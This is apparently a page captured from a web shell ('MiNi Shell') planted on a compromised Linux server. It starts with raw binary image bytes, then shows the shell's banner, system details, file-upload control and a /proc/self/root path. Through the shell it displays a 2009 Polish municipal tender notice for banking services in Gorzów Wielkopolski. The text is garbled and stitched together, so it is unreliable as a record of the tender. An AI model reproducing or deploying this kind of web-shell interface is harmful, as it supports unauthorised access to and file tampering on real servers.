JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090903/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090903/304666-N-2009.html

<p class="kh_header"><b>Gorzów Wielkopolski: Wykonywanie bankowej obsługi Miasta Gorzowa Wlkp.</b><br>
<b>Numer ogłoszenia: 304666 - 2009; data zamieszczenia: 03.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Gorzów Wlkp. , ul. Sikorskiego 3-4, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 095 7355576, faks 095 7355612.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.gorzow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie bankowej obsługi Miasta Gorzowa Wlkp..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje w szczególności:
1)	Otwieranie, zamykanie i prowadzenie rachunku bieżącego, rachunków pomocniczych, rachunków funduszy celowych, rachunków funduszy unijnych w PLN oraz rachunków walutowych z możliwością zmiany liczby obsługiwanych rachunków.
2)	 Wykonawca zapewni realizację operacji bankowych gotówkowych i bezgotówkowych oraz  walutowych, w tym w szczególności poleceń przelewów krajowych i zagranicznych oraz wpłat i wypłat gotówkowych 
w PLN (wypłat gotówkowych bez wcześniejszego informowania o pobraniu do kwoty 30.000 zł) i walucie obcej z rachunków podmiotów biorących udział w zamówieniu w wybranych oddziałach i filiach banku wykonawcy niezależnie w którym oddziale lub filii zostaną otwarte i prowadzone r-ki.
3)	 Wykonawca zapewni obsługę kasową, polegającą na przyjmowaniu wpłat na rachunki bankowe Urzędu Miasta i podległych miastu jednostek organizacyjnych co najmniej w 6 punktach kasowych na terenie miasta Gorzowa Wlkp. bez pobierania opłat od wpłat na rachunki bankowe od wpłacającego jak i od Zamawiającego. W celu wykonywania zamówienia Wykonawca (bank) musi posiadać lub otworzyć na czas realizacji zamówienia oddział lub filię na terenie miasta Gorzowa Wlkp.
Prowizja od wypłat gotówki z kasy banku przez Urząd Miasta i jednostki organizacyjne nie może być wyższa niż 0,1%.
4)	Wykonawca prowadzić będzie operacje bezgotówkowe płatne kartami płatniczymi w kraju i zagranicą, zapewni wydanie i obsługę kart płatniczych.
5)	 Wykonawca zapewni obsługę zleceń w walucie obcej ( kasa walutowa) - wypłata zaliczek pracowniczych na delegacje zagraniczne i ich zwrot,  bez pobierania opłat.
6)	 Wykonawca zapewni usługę masowe płatności, przez którą rozumie się: usługę Wykonawcy polegającą na możliwości przyjmowania wpłat identyfikowanych przez odpowiedni unikalny numer rachunku bankowego (w szczególnym przypadku jednoznacznie identyfikujący płatność), zaksięgowania wpłat, zaksięgowania wpłat na kontach zbiorczych lub indywidualnych w zależności od potrzeb Zamawiającego oraz przekazania stosownej informacji syntetycznej i analitycznej Zamawiającemu 
w formie elektronicznej. Wykonawca powinien dysponować rozwiązaniami informatycznymi zapewniającymi dostosowanie systemu bankowości elektronicznej do systemu finansowo-księgowego miasta Gorzowa Wlkp. w zakresie wykonania tej usługi.
7)	 Wykonawca zapewni realizację przelewów krajowych i zagranicznych w systemie bankowości elektronicznej oraz w formie papierowej w tym masowe uznania. Przez masowe uznania  rozumie się możliwość wysłania przez Zamawiającego zbiorczego przelewu z rozksięgowaniem na konta beneficjentów ze stosownym uznaniem (stosowane w rozliczeniu wynagrodzeń pracowniczych). Wykonawca powinien dysponować rozwiązaniami informatycznymi zapewniającymi dostosowanie systemu bankowości elektronicznej do systemu finansowo-księgowego miasta Gorzowa Wlkp. 
w zakresie wykonania tej usługi.
8)	Wydawanie i realizacja czeków.
9)	 Zamawiający wymaga, aby za operacje związane z przelewami wewnętrznymi oraz przelewami między podmiotami uczestniczącymi  oraz jednostkami organizacyjnymi miasta nie uczestniczącymi w przetargu na konta w banku wykonawcy nie były pobierane opłaty i prowizja.
10)	Zamawiający nie dopuszcza pobierania opłat za zmiany kart wzorów podpisów.
11)	 Na wniosek Zamawiającego zakładanie lokat terminowych (OVER NIGHT, weekendowych oraz 1,2 i 3 miesięcznych) następować będzie bez dodatkowych opłat.
12)	Wykonawca zagwarantuje obsługę i prowadzenie rachunku skonsolidowanego. Konsolidacja sald rachunków miasta polegać będzie na zbieraniu sald wszystkich rachunków - zarówno tych, które mają nadwyżkę środków jak i tych, które korzystają z kredytu w rachunku bieżącym - na jednym wirtualnym rachunku bankowym i lokowaniu tych środków wspólnie. Umożliwi to szybką analizę wpływów z poszczególnych rachunków z możliwością gospodarowania środkami na szczeblu centralnym oraz bieżące monitorowanie stanów środków na rachunkach miasta.
13)	Zamawiający zastrzega sobie prawo do zlecania lokat terminowych w innych bankach.
14)	 Wpłaty gotówkowe dokonywane przez interesantów w siedzibach banku obsługującego rachunki miasta Gorzowa Wlkp. i jego jednostek organizacyjnych będą dokonywane na drukach wpłat opracowanych przez Urząd Miasta oraz na drukach powszechnie obowiązujących.
15)	 Operacje bankowe prowadzone będą do ostatniego dnia roku.
16)	 Wykonawca zamówienia przygotowuje bezpłatnie wyciągi w formie papierowej z załączonymi oryginalnymi dokumentami źródłowymi osobno dla każdego rachunku do godz. 12.00 dnia następnego.
17)	 System bankowości elektronicznej musi posiadać możliwość podglądu stanu kont, wyszukiwania operacji na rachunkach bankowych, drukowania operacji i wyciągów w szczególności:
-uzyskiwanie w czasie rzeczywistym informacji o wszystkich operacjach i saldach na rachunkach podstawowych i pomocniczych,
-uzyskiwanie informacji z archiwum bankowego,
-tworzenie zbiorów danych kontrahentów, numerów rachunków i innych danych ewidencyjnych,
-przeszukiwanie zbiorów wszystkich operacji wg rodzaju operacji, nazwy kontrahenta, daty i kwoty.
18)	 Wysokość prowizji, marży i opłat zawartych w ofercie wykonawcy nie może ulec zmianie przez cały okres trwania umowy.
19)	 Wykonawca dostarczy bezpłatnie w ramach niniejszego zamówienia oprogramowania typu bankowość elektroniczna dla wszystkich podmiotów biorących udział w zamówieniu wskazanych w Załączniku nr 1 do SIWZ w ilości około 80 szt. a także będzie przekazywał i instalował wersje aktualizujące to oprogramowanie w okresie trwania umowy.
20)	 Wykonawca oprócz dostarczenia odpowiedniego oprogramowania i jego uruchomienia zapewni również bezpłatnie wszelkie dodatkowe akcesoria zapewniające bezpieczeństwo pracy dla użytkowników korzystających z usług aktywnych, a zwłaszcza dla osób podpisujących przelewy (podpis elektroniczny). Wykonawca usługi ponosi pełną odpowiedzialność za bezpieczeństwo transakcji w systemie bankowości elektronicznej.
21)	 Jeżeli system, z którego korzysta Wykonawca wymaga zastosowania dodatkowych akcesoriów wówczas Wykonawca dostarczy bezpłatnie odpowiednią ilość narzędzi bankowości elektronicznej ( tj.: tokeny, karty, czytniki itp.).
22)	 Wykonawca zapewni bezpłatne przeszkolenie wskazanych przez Zamawiającego pracowników w zakresie obsługi systemu bankowości elektronicznej.
23)	 Wykonawca zapewni bezpłatnie instalację oraz serwis oprogramowania bankowości elektronicznej na stanowiskach komputerowych wskazanych przez Zamawiającego i podmioty uczestniczące w przetargu zgodnie z ustalonym harmonogramem przez strony (uruchomienie stanowisk bankowości elektronicznej i zapewnienie ich poprawnego działania, karty, czytniki itp.).
24)	 Wykonawca wyznaczy z podaniem danych osobowych oraz nr telefonów dwóch doradców dla Zamawiającego i dwóch dysponentów (pracujących w godzinach pracy Zamawiającego 
i podmiotów uczestniczących w zamówieniu).
25)	 Wykonawca zapewni alternatywne realizowanie przelewów elektronicznych przygotowanych przez systemy informatyczne podmiotów biorących udział w zamówieniu w razie awarii sieci komputerowej wykluczającej możliwość standardowego wykorzystania kanału elektronicznego systemu bankowości elektronicznej ( np. możliwość przygotowania nośnika danych i jego fizyczne dostarczenie do oddziału lub filii Banku).
26)	 Wykonawca zapewni, że zlecenia złożone w danym dniu (najpóźniej do godz.17:00) zarówno dostępnymi dla podmiotu biorącego udział w zamówieniu kanałami elektronicznymi, jak też w formie papierowej, zostaną zrealizowane i zaksięgowane w dniu ich złożenia.
Środki przychodzące w dodatkowe dni wolne (wolna sobota) zostaną zaksięgowane w tym samym dniu.
W pozostałych przypadkach zlecenia zostaną zrealizowane w następnym dniu roboczym do godz. 10.00 (nie dotyczy przelewów elektronicznych i papierowych złożonych w banku w ostatnim roboczym dniu roku - przelewy te winny być zrealizowane i zaksięgowane w tym samym dniu).
27)	Wykonawca ma obowiązek posiadać system bankowy dysponujący następującymi usługami:
-	bankowości elektronicznej,
-	systemu masowych płatności,
-	poleceniem zapłaty,
-	masowe uznania,
-	zlecenia stałe.
2.	Szacunkowe dane dotyczące operacji bankowych dokonywanych przez Zamawiającego na podstawie analizy danych o operacjach bankowych w Urzędzie Miasta i podmiotach uczestniczących w przetargu:
-Ilość rachunków obsługujących Urząd Miasta i jednostki organizacyjne: 320 szt.
-Ilość przelewów wychodzących  (Urząd Miasta i jednostki organizacyjne) rocznie 130.250 szt., w tym:
a) ilość przelewów wychodzących poza Urząd i jednostki organizacyjne rocznie (w tym: w wersji papierowej - 5.210 szt.,  w wersji elektronicznej - 98.990 szt.): 104.200 szt.
b) ilość przelewów wychodzących pomiędzy Urzędem  i jego jednostkami oraz przelewy wewnętrzne- rocznie: 26.050 szt.
-Ilość przelewów zagranicznych w Urzędzie Miasta: 20 szt.
-Szacowana ilość wpłat dotycząca płatności zakwalifikowanych do objęcia systemem masowych płatności rocznie: 70.000 szt.
-Szacowana ilość wypłat dotycząca płatności zakwalifikowanych do objęcia systemem masowego uznania rocznie:	6.000 szt.
-Wypłaty gotówki z banku dokonane przez Urząd Miasta i jednostki organizacyjne na podstawie czeków: 5.000 szt.
-Wartość wypłat gotówki z kasy banku przez Urząd Miasta i jednostki organizacyjne: 33.890.000 zł.
-Wartość wpłat gotówki do kasy banku przez Urząd Miasta i jednostki organizacyjne: 7.800.000 zł.
-Koszt korzystania z bankowości elektronicznej:	17.400 zł.
Liczba operacji bankowych podana jest w przybliżeniu, wg wiedzy Zamawiającego  na dzień ogłoszenia niniejszego postępowania..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 66.11.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 20.000,00 PLN (słownie: dwadzieścia tysięcy 00/100 PLN)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1)	nie podlegają wykluczeniu z postępowania na podstawie art. 24 ustawy Prawo zamówień publicznych,
2)	 spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych oraz: 
3)	zapewnią obsługę kasową w co najmniej 6 punktach kasowych na terenie miasta Gorzowa Wlkp.
Ocena nastapi na podstawie złozonych dokumentów zgodnie z formułą spełnia-nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)	Dowód wniesienia wadium.
2)	Oświadczenie Wykonawcy, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, złożone na druku, stanowiący załącznik nr 3 do SIWZ.
3)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku spółek cywilnych, aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej musi dotyczyć każdego ze wspólników.
4)	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału ZUS lub KRUS potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie społeczne lub zdrowotne lub zaświadczenia, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Dokumenty te muszą złożyć wszyscy wykonawcy wspólnie ubiegający się o przyznanie zamówienia.
5)	Wykaz placówek na terenie miasta Gorzowa Wlkp. wraz z podaniem ilości punktów kasowych na potrzeby realizacji przedmiotu zamówienia.
6)	Jeżeli wystąpią podwykonawcy, wykaz części zamówienia, których wykonanie zamierza powierzyć podwykonawcy.

2. 	Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniami potwierdzonymi przez Wykonawcę.
3. 	W przypadku oferty składanej przez Wykonawcę, który ma siedzibę lub miejsce zamieszkania poza terytorium RP, zamiast dokumentów, o których mowa w punkcie 3 i 4 winien on złożyć dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości;
b)	nie zalega z uiszczeniem podatków, opłat lub składek na ubezpieczenia społeczne i zdrowotne, albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.

Dokument, o których mowa w punkcie a) powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Dokument, o którym mowa w punkcie b) powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w punkcie 3 i 4 można je zastąpić dokumentem zawierającym oświadczenie złożone przed właściwym organem sądowym, administracyjnym, organem samorządu zawodowego lub gospodarczego albo przed notariuszem kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 60</li>
<li>2 - Oprocentowanie środków i lokat - 30</li>
<li>3 - Uruchomienie punktów kasowych i stanowiska dysponenta w siedzibach Zamawiającego - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.gorzow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Gorzowa Wlkp. ul.Sikorskiego 3-4, 66-400 Gorzów Wlkp. pok.315.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.10.2009 godzina 12:00, miejsce: Urząd Miasta Gorzowa Wlkp. Kancelaria Ogólna, ul. Sikorskiego 3-4, 66-400 Gorzów Wlkp..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W ramach  kryterium oceny ofert: Oprocentowanie środków i lokat - wprowadza się podkryteria, podając sposób oceny każdego z nich na podstawie danych z Formularza cenowego w zakresie oprocentowania środków finansowych i lokat.
1)	płatnych na żądanie avista - 15%
2)	lokata automatyczna: na porę nocną powyżej 10.000 zł - 2%
3)	lokata automatyczna: weekendowa na 48 godzin, powyżej 10.000 zł - 2%
4)	lokata terminowa: na 1 m-c  w kwocie powyżej 100.000 zł - 2%
5)	lokata terminowa: na  2 m-ce w kwocie powyżej 100.000 zł - 4%

Creat By MiNi SheLL
Email: jattceo@gmail.com